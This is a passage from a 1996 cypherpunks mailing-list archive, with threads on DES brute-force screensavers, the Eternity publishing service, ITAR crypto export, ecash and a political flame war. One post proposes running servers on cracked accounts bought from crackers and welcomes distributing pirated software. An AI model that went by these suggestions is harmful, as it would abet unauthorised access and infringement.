To: hallam@Etna.ai.mit.edu
Subject: Re: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221607.AA00659@Etna.ai.mit.edu>
Message-ID: <Pine.3.89.9607240016.A9441-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 22 Jul 1996 hallam@Etna.ai.mit.edu wrote:

> >Limbaugh is giving up the show because it is run in syndication. 
> >Syndication is not a profitable format with the ensuing satellite blitz 
> >on the horizon. 
> 
> 
> I find your argument only moderately less convincing than the average
> political campaign ad.

Your opinion. It's not an argument; it's the way it is.

> 
> Given Limbaugh's propensity for telling blatant fibs I don't credit anything
> he says as being likely to bear any relation to the truth, particularly
> when it would mean admitting failure and retreat.
> 

Again your opinion. 

> Syndication is highly profitable for many, if its profitable to syndicate
> drama with its astronomic production costs it is profitable to syndicate
> Rush with his astronomic weight. 
> 

Good straw man defense: Apples == Oranges.

Syndication is only profitable for those shows that can make the time 
slots garnered with the biggest advertisers. Drama wins because it's 
chewing gum for the mind - just like Clinton's saturday morning 
broadcast and the subsequent denials issued afterwards. Zero thought 
television appeals to the masses, ie: Bay Watch != Script.

Talk shows that attempt to stimulate active thought on reasonable premise 
generally do not survive long in syndication. With Limbaugh's show, it 
took a double hit as the markets it played to were for the most part late night. 
BTW, this comes from actually looking it up in past TV Guides - not 
mindlessly drooling over the radio - so put away the "he's lying" crap.

In addition, Limbaugh, like other TV hosts, has zero control over when 
the show airs and which episodes get aired. To screw someone in the 
Nielsons, you place the show in the low rate time bracket to guarantee 
bottom ratings, and do re-runs. It's doesn't matter how good the show is 
- it won't fly.

Following the shallow logic of your argument, Limbaugh is not a success 
because he does not broadcast on TV. That parallels the generally 
accepted myth (especially in academia) that one is not an expert in the 
field unless published.


> >Limbaugh is a buisnessman and a commentator. He earns a living. He will 
> >do what is necessary to leverage his marketability to make the most money.
> 
> >Since you've gone to college, I'll have to explain it to you: It's called 
> >capitalism - look into it...
> 
> Its called failure and spin control. Rush has not announced a new TV show,
> he has closed his only TV show. He has closed after his audience declined
> and his contracts expired. That is the business decision of the local
> stations who don;t see Rush as profitable business anymore and advertisers
> who don't want to see their products associated with appologists for
> the Oaklahoma bomb.
> 

Again, your opinion of the situation. Adverstisers are whores. That's 
what they get paid to do. IF they think going PC will sell more product, 
that's what happens. Watch and see the score of all the Clinton's business 
backing when Hillary is finally indicted.

> 
> >You fail to acknowledge the simple fact that a segment of society that 
> >feels not only disenfranchised, but that the system is irrepairable will 
> >stoop to whatever means they feel is necessary to make their point. They 
> >don't care what other people think - just what they believe in. 
> >Discrediting is a non issue.
> 
> I know that facism has an appeal for many people but that does not mean
> that they are not a minority. And I am not using the words Facism as a
> casual insult but as an accurate description of a movement which is in
> large part a vehicle for racism and has already caused 200 plus murders
> at OKC. 
> 
> Every time an extreeme idological faction of the left or the right gains
> power there are splinter groups from that side claiming that the failure
> of the policies is due to them not being compromised and insufficiently 
> ideal. Since right wing idealogues have been dominant in the US for some 
> time it is the right wing extreemists who are to the fore.
> 
> 

Right wing, left wing. It's all the same. Pigeon holes for unpopular 
ideas. 

The issue I take with this, is the constant spouting of King Bill's 
pronouncement of why OKC occured in the first place. We don't know WHY it 
took place - that's what a trial is for (if you actually believe that 
justice is blind and lawyers tell the truth always). We will NEVER really 
know - but it's damn fine political fodder to take an unconstitutional 
swipe at the populous with the anti-terrorist legislation.

If you firmly believe the premise that Fascism was the root cause behind 
OKC, then you have no choice but to look to the White House and Capital 
Hill. 

...Paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reinhold@world.std.com (Arnold G. Reinhold)
Date: Wed, 24 Jul 1996 15:36:50 +0800
To: cypherpunks@toad.com
Subject: Re: passphrase and Diceware [was Re: Length of passphrase beneficial?]
Message-ID: <v02130501ae1b600ee0b5@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>The author of the Diceware system is Arnold G. Reinhold and can be contacted to

 reinhold@world.std.com

>He has three pages: The Diceware Passphrase home page (html), The Diceware
>WordList (ascii) and a text with the technical rationales behind the list
>(ascii)
>I don't remember the URL, sorry
>Greeting,
>Jean-Paul
>
>~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
>Jean-Paul et Micheline Kroepfli
>eMail: JeanPaul.Kroepfli@utopia.fnet.fr

The Diceware Passphrase home page:

   http://world.std.com/~reinhold/diceware.page.html

The Diceware WordList:

   http://world.std.com/~reinhold/diceware.wordlist.asc

Technical rationales behind the list:

   http://world.std.com/~reinhold/diceware.txt

Other stuff that may be of interest, including a survey on PGP passphrase
usage and a rant on why p=?np has nothing to do with crypto:

   http://world.std.com/~reinhold/papers.html

Regards,

Arnold G. Reinhold
reinhold@world.std.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 24 Jul 1996 12:32:28 +0800
To: hfinney@shell.portal.com
Subject: Re: Ross Anderson's Eternity service
In-Reply-To: <199607230313.UAA18607@jobe.shell.portal.com>
Message-ID: <199607240030.BAA00531@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney <hfinney@shell.portal.com> writes:
> Sherry Mayo posted here a while back a reference to Ross Anderson's
> Eternity service paper, <URL: http://www.cl.cam.ac.uk:80/users/rja14/#Lib >.
> He is also giving an invited talk on the subject this fall at a crypto
> conference in Prague.
> 
> The goal of the Eternity service is to make published information
> permanently and ineradicably available, despite efforts on the part of
> powerful attackers to destroy it.  The attack model explicitly
> includes governments.  This has obvious relevance to current
> controversies involving copyright, trade secrets, etc.

I too read this paper a while ago (probably after reading Sherry's
post also).

> It's difficult to evaluate the proposal because many of the issues
> seem more legal than technical.  Can a service like this, which
> would seemingly exist largely to circumvent legal restrictions on
> publishing, possibly be legal?

Probably not.  Perhaps it could be operated illegally.  If it were
possible to operate it illegally without getting individuals martyred.

> A few questions for discussion:
> 
>  - Would it be possible in practice to run a network like this?

Technically, I don't see why not.  Legally and politically much more
tricky.

Continuing with the theme above of operating the system illegally,
another approach might be to use disposable accounts as nodes, with
anonymously opened accounts.  If legal pressure got to the stage that
countries outlawed anonymous accounts, perhaps cracked accounts bought
from crackers could be used to run transient nodes in the Eternity
service.  A useful ethical role for system crackers even.

Or alternatively perhaps there are enough countries around that
Anderson's suggested use of many jurisdictions (particularly those
with low regard for copyright would be good candidates) would be
possible.  These countries could lead the role in supplying the
service for the unenlightened powers in other countries.  I have a
vague memory of hearing that there is at least one country which has
no copyrights on software for individuals, but does for commercial
use.  Perhaps the service could survive on this model for a while
before the US/NATO/OECD felt obligated to act as world police man and
offer to nuke the countries, or cut off all trade or something.

>  - Would there be much interest in it among users?

You bet!  It would be a most excellent source for a number of groups: 

- cypherpunks, users of crypto software for ITAR restricted material

- Scientologist detractors could publish their views anonymously
  without fear of reprisals, remove problems of censorship in general

- People who use copyright software without buying it: copyright
  software could be distributed with impunity, for free

- Anyone with an interest in obtaining a permanent URL for themselves
  could purchase 50 years worth of exposure for 1Mb (Anderson proposes
  selling space with ecash per Mb year).

>  - Would it be a net benefit to society for such a service to exist?

Depends on your views of the benefits to society as a whole of
copyright, patents and so on.  Granted many have commercial interests
in seeing these systems continue.  Some people on this list seem to be
of the opinion that patents, and product copyright are becoming an
obsolete system with near free copying.  (These people make analogies
with the advent of the printing presses, the loss of power of guilds,
and so on).

I'm not sure it need destroy civilization as we know it if some of
these changes did take place... many people would benefit from access
to a wider range of software and ideas.  There is the argument that
perhaps people won't bother to write software if they can't sell it.
I think that vendors would -cope- if software copyright were
hypothetically to be disabled in one swoop as a fait-acompli, they
would structure their charges differently: charge less perhaps,
include printed manuals (photocopying often costs more than the book),
include tech support contracts, and so on.

I'm sure it's widely acknowledged that only a modest percentage of
software is actually bought anyway (if we were to take a brief survey
(anonymous of course) of the percentage of non-paid for software on
their hard-drives, a fair amount of non-copyright compliance by
individuals would be demonstrated).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 24 Jul 1996 20:57:56 +0800
To: perry@piermont.com
Subject: Re: Brute Force DES
In-Reply-To: <199607231338.JAA15819@jekyll.piermont.com>
Message-ID: <199607231619.CAA18593@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> "Peter Trei" writes:
> > The fastest general purpose, freely available des implementation I'm
> > aware of is libdes. by Eric Young. With this, I can do a set_key in 
> > 15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
> > about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).
> 
> I'll point out that like most DES implementations, Eric's tries to
> spend a lot of time in key setup to save time later on in
> encryption/decryption. This tradeoff would probably be very different
> if you didn't plan on trying more than one or two blocks of decryption
> after getting a key.
> 
> Perry

90 us is several times longer than 15.


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 20:25:00 +0800
To: cypherpunks@toad.com
Subject: RE: Distributed DES crack
Message-ID: <199607240927.CAA18805@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 PM 7/23/96 PDT, koontz@netapp.com (Dave Koontz) wrote:
>  >   I'd like to see a very general hardware processing power equivalence
table.
>  >   For example, 1 MasPar equals how many Pentiums.
>
>One MasPar MP2 (4K processors) could run 300,000 crypt(3) crack attempts
>per second (a password checker).  That should give you 6 or 7 million 
>brute force key attempts per second.

Interesting - thanks for the result.  Do you know how tightly tuned
the crack implementation was (e.g. straight C with MasPar optimizer,
hand-tuned assembler, etc.)?  Since the MasPar has a large number of
very small processors, I'd expect it to be better at bit-twiddling
than conventional processors.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 21:04:28 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
Message-ID: <199607240927.CAA18810@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim and others have discussed the effectiveness of random search
vs. centralized servers, problems of cheating, scaling, etc.
My take is that, if you can ignore scaling, the best approach
is probably to have a central server that doles out keyspace
and wraps around when it reaches 100%, and doesn't worry too much
about collecting results - even if there are cheaters, machine
failures, etc., and people don't finish their keyspace,
it'll be more likely to cover the whole space than randoms.
(Make it a web page, and use cut&paste to transfer to the
search programs so they don't need to be network-equipped.)

To support scaling, make it easy for people to run subset servers;
grab a chunk of keyspace from the main server and dole it out
to people who ask you for it.  If you want to get fancy,
hack a DNS server to allow people to register their machines
as NNN.descrack.org, 0<=NNN<1000, so that people can find 
subsets without having to ask the main server.

>>> a brute force "screen saver" for

>-- By the time the total amount of computons expended has equalled the
>amount that would have been expended in a "no duplications" allocated
>search, the Poisson probability distribution says that 1/e = 36.8% of the
>keyspace will not have been searched; the rest of the probabilty lies in
>keyspace searched once, twice, three times, etc.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Wed, 24 Jul 1996 20:29:52 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
Message-ID: <Pine.BSF.3.91.960724015854.627A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


On the subject of choosing keys randomly, rather than dividing up the
keyspace... 

This seems like a very good idea to me.

One potential problem is actually choosing the random keys. Have to be
able to get entropy at a fast rate, and/or use a good PRNG. Both of these
things would take time away from the actuall cracking (more time than just
incrementing the key). And if a weak PRNG is used in order to save time,
it's possible that it might favour certain keys and thus interfere with 
the attempt.

Any ideas for a fast and good PRNG?


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Wed, 24 Jul 1996 20:12:23 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
In-Reply-To: <Pine.BSF.3.91.960724015854.627A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.BSF.3.91.960724023443.627B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


A few seconds ago, I wrote:
> One potential problem is actually choosing the random keys. Have to be
> able to get entropy at a fast rate, and/or use a good PRNG. Both of these
> things would take time away from the actuall cracking (more time than just
> incrementing the key).

It's probably best to just choose a random starting point, and increment 
from there. I don't think that will affect the odds any. Problem solved.

I thought of this less than a second after I sent the message out. :-/


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 20:30:32 +0800
To: cypherpunks@toad.com
Subject: Exporting cryptosystems in pieces: Re: Question [NOISE, mostly]
Message-ID: <199607240942.CAA19145@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Cc: vice.president@whitehouse.gov,

The cypherpunks list has been discussing ITAR again. :-)
>>  If it is illegal (by our governments standards...) to export programs
>>like PGP, etc., and you can send the whole source code in a message
>>because that is also considered illegal, then could you send the code,
>>broken up into many pieces, and send THAT in Email, would that be
>>illegal?

Exporting components of military hardware, including cryptosystems,
is also specifically banned by ITAR.  How big a piece is enough to get
you prosecuted is a question for the nastiest of the N prosecutors out there,
and whether you can be convicted is a question for the best of
the 12 jurors you'll have....

Vince Cate's arms exporter page lets you export a highly-useful
fully working cryptosystem in three lines with one mouse click
(developed by Adam Back and an international cast of dozens.)

Adam Back's export-three-lines-of-PGP-at-once is a more blatant
test of this; go see his web pages.

Here's my two bits worth - the following bits are components of
PGP, Netscape 3.0b5, and also of RSAREF.
        0
        1

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 13:00:34 +0800
To: cypherpunks@toad.com
Subject: Schelling Points, Rights, and Game Theory--Part I
Message-ID: <ae1a56a81b021004f415@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Part I

I thought I'd write a brief piece on a very interesting angle on "rights,"
especially given the discussion recently about rights of privacy,
children's rights, parent's rights, the role of schools, gun rights, and so
on.

This also shows the role of game theory, imperfect as it is. (I mention
"imperfect" because some have mentioned that game theory does not explain
things  perfectly...of course not.)

Here's a simple example of what a Schelling point is:

Alice and Bob decide to meet on Friday in the Washington, D.C. area. They
forget to say when and where. Is it hopeless? Can they find each other?

Given the millions of places they could be, and the hundreds or more of
time-slices to consider, e.g. "10:23 a.m., 345 Crestwood Drive, Arlington,"
how could they ever meet?

Well, there are certain "mutually more probable" times and locations.
Absent any time specification, "noon" is what each will expect the other to
also think of. (Followed perhaps by 6 p.m., and other on-the-hour times.)
And absent any location specification, there's a short list of likely
places: NSA headquarters (after all, Alice and Bob are well-known there),
in front of the White House, at the base of the Washington Monument, at the
entrance to the Air and Space Museum, on the steps of the Supreme Court,
etc.

I'd say they have about a 10% chance of finding each other, absent any
prearrangement. (In smaller cities, the probabilities are even higher, as
the central plaza is a major Schelling point for such encounters.)

The game theorist Richard Schelling developed this notion, circa about
1960. There are analyses based on "algorithmic information theory," a la
Chaitin and Kolmogorov, which I find appealing, to wit: a Schelling point
has a shorter "description" in terms of mutually-known building blocks than
non-Schelling points. Thus, "noon in front of the White House" has a
shorter description, or is more "compressible," than is "10:23 a.m., 345
Crestwood Drive, Arlington." (Don't think in terms of just ASCII
characters, but in terms of readily recallable building blocks.)

How does this relate to rights?

This is more controversial, and less-developed. David Friedman gave me a
paper he's done on this..."Schelling points" are a Schelling point between
us, as it were.

Part II will get into this briefly.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 05:51:57 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
Message-ID: <ae1a5e6f1d021004c7bc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:02 PM 7/23/96, Lucky Green wrote:
>At 15:53 7/23/96, Timothy C. May wrote:
>
>>Or several times that number of machines or time for machines with less
>>crunch. Say, 100K Pentium-type machines for a month or two. How might this
>>be gotten?
>>
>>A while back I proposed one approach: a brute force "screen saver" for
>>Windows machines. Other platforms, maybe, but the most cost-effective thing
>>to do is to go after the Windows market only.
>
>A friend of mine actually wrote an RC4-40 cracking screen saver during the
>initial RC4 crack. We finished the brute force so quickly that he never
>released the software.
>

Too bad. Properly modularized software, i.e., with a place to drop in the
specific system/algorithm being attacked, could be adapted quickly to
DES-busting, or whatever.

If your friend still has this, and it's not just spaghetti code, maybe he
can adapt it to a truly large-scale attack.

BTW, sitting in my hot tub last night I quickly reconstructed the math for
the "random" keyspace inefficiency:

-- Imagine that N users are "randomly" picking chunks of keyspace to
search. That is, they are not coordinating with others to avoid
duplication.

-- By the time the total amount of computons expended has equalled the
amount that would have been expended in a "no duplications" allocated
search, the Poisson probability distribution says that 1/e = 36.8% of the
keyspace will not have been searched; the rest of the probabilty lies in
keyspace searched once, twice, three times, etc.

-- Thus, the calculation will have to go 2-4 times longer to give a high
(>95%) chance that the answer is found. For example, at 3 times the
"efficient" search time, there is only a 1/e^3 = 5% chance that nobody has
found the answer

The probabalistic assignment is less efficient, obviously, but has the
advantage of not requiring a registry of keyspace allocations. Further,
"denial of service" attacks (lying about having searched a chunk, or
incorrectly searching or reporting) are not a problem.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Wed, 24 Jul 1996 19:56:22 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Kids and Computer Privacy Was  Re: No more stupid gun thread ...
Message-ID: <199607240845.DAA09636@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:24 PM 7/22/96 -0700, you wrote:
>Ok.  This thread has gone on long enough and covered just about every
>point except the one which I originally made in my first response,
>which is that I abhor the idea that kids should carry weapons (of any
>sort) to school as standard equipment.  In fact, I abhor the idea
>that kids should carry weapons at school for any reason.
>
>Enough said.
>
>I do not care to discuss:
>
>1.  Should kids have any weapons at any time?
>
>2.  Should kids have guns (specifically guns)?
>
>3.  Should kids know how to operate weapons of any sort?
>
>If any of you really really have to discuss this issue, let's spare
>the rest of the list and send me E-Mail directly.
>
>Thanks!
>
>Ern
>

Should kids have crypto? [weapons]

Should parents teach their kids crypto at an early age?

Should kids have a right to privacy?
        If yes, should there be a limit to the privacy they hold?

Under Itar crypto is a weapon.  If a kid were to bring a disk
containing pgp to school could they be expelled for carrying a weapon?

Should children's legal rights be taught at school at an early age?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Carpenter <mcarpent@Dusk.obscure.net>
Date: Wed, 24 Jul 1996 19:57:28 +0800
To: cypherpunks@toad.com
Subject: emscrypt 0.01 ALPHA
Message-ID: <199607240857.DAA06070@Dusk.obscure.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I finally managed to find some time to do a little testing of emscrypt and
make some of the changes that were suggested here earlier.  It is still
rather ugly and I haven't added many of the features/capabilities I hope to
eventually implement.  But I'm making it available so that people can play
with it if they want.  It looks like I'm going to be very busy for at least
the next month trying to finish up the work for my master's degree, so I
probably won't be making any major changes for a while.

emscrypt's purpose is to automatically run PGP signed scripts received by 
e-mail and return the results to the submitter.  emscrypt is a heavily
mutated version of morepgp, originally by Jason Steiner and modified by Greg
Spencer.

Please realize that this program has NOT undergone extensive testing, so you
may encounter strange behaviour.  Make sure you read the documentation that
exists.  Using this program may make your system insecure, especially
if you don't follow the installation procedure carefully.  Use at your own
risk.

You should be able to find emscrypt and some documentation at:
http://www.bmen.tulane.edu/~carpente

Look under the "Other random projects or possibly useful stuff" heading.


In order to try out emscrypt you need the following:

* Perl -- emscrypt is written in Perl.

* PGP 2.6.2 -- Other versions may work, but I haven't tested them and
emscrypt relies strongly on knowing the format of the PGP output messages.

* Procmail -- For passing incoming mail to emscrypt.  This can be accomplished
in other ways, but at this point I haven't tried any of them.  If you don't
have procmail you can still play with emscrypt by piping messages to it
manually.  I strongly suggest you do this anyway, to make sure you trust
emscrypt to answer incoming mail.



Here are the major things that have changed with emscrypt since I described
it here a while ago:

There are now two required headers which must be included in the body of
the signed message: 'Reply-To:' and 'PGP-Key-Fingerprint:'. Both must appear
before the beginning of the script.  The beginning of the script is
considered to be anything other than the above headers, blank lines, or
lines that begin with '::' but that are otherwise empty.  Duplicate headers
will generate an error and prevent the script from executing.  Case within
the headers is not important.  (You are free to use eLiTE d00dz
capitalization techniques, just don't try to use kRe8yv sP3lliNg5.)

'Reply-To:' must be followed by a valid e-mail address, otherwise you won't
get your results. (emscrypt will also recognize a 'Request-Remailing-To:'
header in place of 'Reply-To:'.  I added this so that emscrypt could be
treated as a "remailer".  The idea is that you could use software such as
premail to automate the generation of messages going to emscrypt, so that
you don't have to do the signing/encrypting manually.  Then you could just
send a script to yourself, "chaining" it through your emscrypt "remailer".
But I don't think this will work without slight modifications to the
remailer message generating programs, since emscrypt requires the
'Request-Remailing-To:' header within the signed body of a message (it would
also be nice if the 'PGP-Key-Fingerprint' header could be automagically
included)).

The 'PGP-Key-Fingerprint:' header gives the fingerprint of the key used to
sign the message and which will also be used to encrypt the results.  It
must also be included within the signed body of the message.

Most of the other changes involved minor debugging and general clean-up (not
that I consider it clean now).  I also improved the error handling a little,
but it needs more work, too.  Right now emscrypt generally tries to generate,
encrypt, and mail an error report if things go wrong.  If that doesn't work,
then it saves an error message to a log file.

If you find any problems, please let me know. Comments, suggestions, 
etc. are also welcome.


Thanks,

- --Matt

- --
mcarpent@mailhost.tcs.tulane.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfXlaijtJAMyBnp9AQHAdAf+MQ/ZroKoLeYyQDYabVrIq1eLSQB6vpr+
2tXu63wDbcUeFoeSFNx6Sar7DNtAJyJUlwVcVKlb5SOuYR/8aFDvAnIYuQLPfdXd
xXjC4iv+Hh3hNx4ibeyAB4xbFmDYAMB19zEf6nhmJdxR03oFXP+Qfx2m/aN/LDKZ
zVSjtOs/ujTa6ltP6r/9x1vdiqmSNuSCNLvL/f4YulfdzR8frF0uLyLmiDH6mUpm
etKxSpIg4ZI+iy1YvvSd+FtA0F3XSziaLEepx4X8gYjZKP0YXPTEMGhTeWj1o6bP
yl06KUIRTL5k56P0xnW2MezGN5c0Cz2W9TEa9NBbHxY1DgSTDWa3sg==
=DTpY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 08:04:58 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <ae1a71bf00021004d8f3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:42 PM 7/23/96, Alex F wrote:
>> >  People buying CDs at a garage sale & getting arrested for
>> >piracy.  Wonderful.
>>
>> Arrests like this are uncommon. Even buying "cheap bikes" and other "cheap"
>> (= probably stolen and fenced) merchandise almost never subjects the
>> purchaser to criminal sanctions.
>
>Yes, but concievably if (whoever would be incharge, FBI?) *could*,
>under law do this, even if they are wrong.  It is a lot harder to
>prove that they intentionally harrassed *you* than it is for them to
>say that they were following leads and show evidence.  Yes, this may

To go to trial, an indictment would be needed. How likely is this? Not very.

Discussion of "in theory they could arrest you" points often neglects the
realities of the legal system.

A large fraction of pawnshop items have questionable provenance, the items
having been stolen at some time in the past. Could J. Random Buyer who
walks in, sees an item he likes, buys it, and walks out with it be
handcuffed and taken down the lockup for the crime of buying stolen
property? Doubtful, in the real world. And defense would be ridicuously
easy.


>Cds are often sampled at 48 these days.  Mine was, and we had to
>reduce it to 44.1 for mass producing (much to our surprise, since
>many CD manufacturers love getting stuff at 48 over 44.1)

A trivial increase in frequency, and still not allowing the hypothesized 30
KHz signal to be added. DATs often sample at 44 and 48 KHz, switchably. The
CD standard is of course still what it is.

>Not familiar with the Nyquist limit w/ regards to sampling rate vs
>frequency :(

Check any textbook, or even a good dictionary. Basically, it says that one
must sample at more than twice the frequency of the highest frequency to be
reconstructed. Thus, a 20 KHz top frequency needs at least 40 K samples per
second. The exact number is, I think, about 2.2x the freqency, which is why
CDs were standardized at 44 K samples per second per channel.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Carpenter <mcarpent@Dusk.obscure.net>
Date: Wed, 24 Jul 1996 21:43:32 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
Message-ID: <199607241015.FAA06111@Dusk.obscure.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Lucky Green wrote:
>At 23:19 7/22/96, Anonymous wrote:
>
>>How about getting the CyberCafes to accept ecash?  Just pull out your
>>Newton/HP48/PDA and point the IR beam at the cash register.  Now that's
>>an ecash application I'd like to see!!
>
>So would I. And one day we will. Though not not on the HP48.

Actually I've been doing some more thinking about this recently, and it may
be possible even on an HP48, if you're willing to limit your spending 
flexibility a little in order to gain the advantages provided by ecash.

A couple months ago there was a similar thread on using ecash with Newtons,
PDA's, palmtops, and so on.  I mentioned an idea of having an "ecash ATM" on
an online machine, which would allow you to download ecash coins to your
portable device.  You could then carry the ecash around with you.  This way
you wouldn't need a full blown ecash client on the portable, just a simple
program that would ask you for the payment amount and send off the
appropriate coins.  The main problem with the idea seemed to be that I
suggested getting change from the merchant.  Ian Goldberg pointed out that
with the current ecash protocol, accepting change not only eliminates your
anonymity, but that you also have to go online to make sure you aren't being
cheated.

Anonymous's post got me to thinking about this again.  Since I know
many of you are more knowledgeable about ecash than I, let me know if you
can add more detailed information or see any problems with the approach below 
(other than a certain lack of convenience, which may be the major issue 
with this approach). 

What if we just forget about change?  One of the neat things about ecash is
that it allows for coins of (fairly) arbitrary values.  We can use this to
our advantage, since we can guarantee that we can make a single payment of 
any value with a small number of coins.  (People familiar with ecash
know all this already I'm sure, but I'll describe it in some detail for 
others who may not have thought about it as much).

Here's the basic formula:

     Number of required coins = ceiling( log2( P/L ) )

where P is the maximum payment amount available to spend on a single 
transaction, and L is the "loss limit", or the upper limit of money we are 
willing to lose on a single transaction.  For example, if we want to be 
able to make a $50 payment to the nearest cent ($.01), we need:

